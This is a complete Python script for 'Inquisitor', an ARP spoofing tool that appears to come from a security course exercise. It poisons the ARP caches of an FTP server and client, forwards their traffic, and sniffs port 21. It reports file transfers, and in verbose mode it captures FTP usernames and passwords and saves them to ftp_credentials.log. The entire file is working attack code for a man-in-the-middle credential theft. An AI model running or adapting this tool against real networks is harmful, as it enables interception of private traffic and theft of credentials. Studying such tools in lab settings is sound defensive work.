#!/usr/bin/env python3

import re
import sys
import time
import argparse
import threading
from scapy.arch import get_if_hwaddr
from scapy.all import ARP, Ether, sendp, sniff, TCP, IP, Raw



# ansi colors
CYAN = "\033[96m"
GREEN = "\033[92m"
YELLOW = "\033[93m"
RED = "\033[91m"
ORANGE = "\033[38;5;208m"
RESET = "\033[0m"

def restore_network(ip_src, mac_src, ip_target, mac_target):
    print(f"\n{ORANGE}[INFO] Interruption signal received (CTRL + C). Restoring network configuration...{RESET}")

    toggle_ip_forwarding(enable=False)

    # restoring their original MAC addresses
    restore_target = Ether(dst=mac_target) / ARP(op=2, pdst=ip_target, hwdst=mac_target, psrc=ip_src, hwsrc=mac_src)
    restore_src = Ether(dst=mac_src) / ARP(op=2, pdst=ip_src, hwdst=mac_src, psrc=ip_target, hwsrc=mac_target)

    sendp(restore_target, count=4, iface="eth0", verbose=False)
    sendp(restore_src, count=4, iface="eth0", verbose=False)

    print(f"{GREEN}[SUCCESS] ARP tables successfully restored. Program terminated safely.{RESET}")
    sys.exit(0)

def process_packet(packet, verbose, my_mac):
    # anti-echo filter
    if packet.haslayer(Ether) and packet[Ether].src == my_mac:
    # ignore packets originating from our own machine (retransmitted packets).
        return

    if packet.haslayer(Raw):
        try:
            # binary to text
            payload = packet[Raw].load.decode('utf-8', errors='ignore').strip()

            # exchange files
            if payload.startswith("RETR "):
                print(f"{YELLOW}[INFO] Download detected (RETR): {RESET}{payload[5:]}")
            elif payload.startswith("STOR "):
                print(f"{YELLOW}[INFO] Upload detected (STOR): {RESET}{payload[5:]}")

            # -v: verbose mode (bonus)
            if verbose:
                if payload.startswith("USER "):
                    print(f"{YELLOW}[INFO] Login attempt detected: {RESET}{payload[5:]}")
                    with open("ftp_credentials.log", "a") as f:
                        f.write(f"USER: {payload[5:]}\n")

                elif payload.startswith("PASS "):
                    print(f"{YELLOW}[WARNING] Password intercepted: {RESET}{payload[5:]}")
                    with open("ftp_credentials.log", "a") as f:
                        f.write(f"PASS: {payload[5:]}\n")
                        f.write("-" * 20 + "\n")

                elif not payload.startswith("RETR ") and not payload.startswith("STOR "):
                    print(f"{CYAN}[VERBOSE] FTP traffic: {RESET}{payload}")

        except Exception:
            # ignore if packet not readable
            pass

def start_sniffer(verbose):
    print(f"{GREEN}[INFO] Network sniffing started (monitoring FTP traffic)...{RESET}")

    try:
        # attacker's mac address
        my_mac = get_if_hwaddr("eth0")

        # listen on FTP port 21
        # store=False: Avoids excessive memory usage
        sniff(filter="tcp port 21", prn=lambda pkt:process_packet(pkt, verbose, my_mac), store=False)
    
    except Exception as e:
        print(f"{RED}[CRITICAL] Sniffer stopped unexpectedly: {RESET}{e}")

def arp_poison(ip_src, mac_src, ip_target, mac_target):
    # op=2 : "ARP Reply" (unsolicited response) + Encapsulation Ethernet
    poison_target = Ether(dst=mac_target) / ARP(op=2, pdst=ip_target, hwdst=mac_target, psrc=ip_src)
    poison_src = Ether(dst=mac_src) / ARP(op=2, pdst=ip_src, hwdst=mac_src, psrc=ip_target)

    print(f"{GREEN}[INFO] Starting full-duplex ARP spoofing attack...{RESET}")
    print(f"{ORANGE}[INFO] Press CTRL+C to terminate and restore network configuration.{RESET}")

    toggle_ip_forwarding(enable=True)

    try:
        while True:
                sendp(poison_target, iface="eth0", verbose=False)
                sendp(poison_src, iface="eth0", verbose=False)
                time.sleep(2)
    
    except KeyboardInterrupt:
         restore_network(ip_src, mac_src, ip_target, mac_target)

def toggle_ip_forwarding(enable=True):
    path = "/proc/sys/net/ipv4/ip_forward"
    value = "1" if enable else "0"
    action = "Enabling" if enable else "Disabling"

    try:
        with open(path, "w") as f:
            f.write(value)
        print(f"{CYAN}[INFO] {action} IP Forwarding...{RESET}")
    
    except PermissionError:
        print(f"{RED}[ERROR] Cannot modify IP Forwarding (Permission Denied). Are you root?{RESET}")

    except OSError as e:
        # Handle Docker read-only file system errors
        print(f"{YELLOW}[WARNING] Docker environment detected (Read-only fs). Relying on Docker sysctls for IP Forwarding.{RESET}")

def validate_inputs(ip_src, mac_src, ip_target, mac_target):
    ip_regex = re.compile(r"^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$")
    mac_regex = re.compile(r"^([0-9A-Fa-f]{2}[:-]){5}([0-9A-Fa-f]{2})$")

    if not ip_regex.match(ip_src) or not ip_regex.match(ip_target):
        print(f"{RED}[ERROR] Invalid IP address format.{RESET}")
        sys.exit(1)
    
    if not mac_regex.match(mac_src) or not mac_regex.match(mac_target):
        print(f"{RED}[ERROR] Invalid MAC address format.{RESET}")
        sys.exit(1)

def main():
    parser = argparse.ArgumentParser(description="Inquisitor - ARP Spoofing Tool")
    parser.add_argument("ip_src", help="Source IP address (e.g., FTP server)")
    parser.add_argument("mac_src", help="Source MAC address")
    parser.add_argument("ip_target", help="Target IP address (e.g., victim/FTP client)")
    parser.add_argument("mac_target", help="Target MAC address")

    # -v: verbose (bonus)
    parser.add_argument("-v", "--verbose", action="store_true", help="Verbose mode (displays full traffic and login attempts)")

    args = parser.parse_args()

    validate_inputs(args.ip_src, args.mac_src, args.ip_target, args.mac_target)

    # sniffer on a thread to avoid blocking script
    sniffer_thread = threading.Thread(target=start_sniffer, args=(args.verbose,))
    sniffer_thread.daemon = True # disabled when CTRL+C
    sniffer_thread.start()

    # main process
    arp_poison(args.ip_src, args.mac_src, args.ip_target, args.mac_target)

if __name__ == "__main__":
    main()
